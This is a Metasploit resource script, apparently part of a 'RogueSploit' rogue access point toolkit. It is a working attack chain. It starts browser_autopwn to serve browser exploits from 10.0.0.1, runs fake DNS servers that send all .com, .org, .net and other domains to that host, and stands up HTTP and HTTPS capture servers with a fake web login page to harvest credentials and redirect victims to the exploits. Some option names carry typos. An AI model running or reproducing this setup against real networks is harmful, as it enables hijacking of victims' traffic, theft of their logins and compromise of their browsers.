Files
RogueSploit/roguepwn1.rc
2016-12-19 15:14:12 +01:00

46 lines
907 B
Plaintext

use auxiliary/server/browser_autopwn
set LHOST 10.0.0.1
set LPORT 45000
set SRVHOST 10.0.0.1
set SRVPORT 8081
set URIPATH /try
run -j
use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu. *.fr
set TARGET ACTION BYPASS
set SRVPORT 5353
run -j
use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
set TARGET ACTION BYPASS
set SRVPORT 53
run -j
use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 80
run -j
use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SSL true
set SRVPORT 443
run -j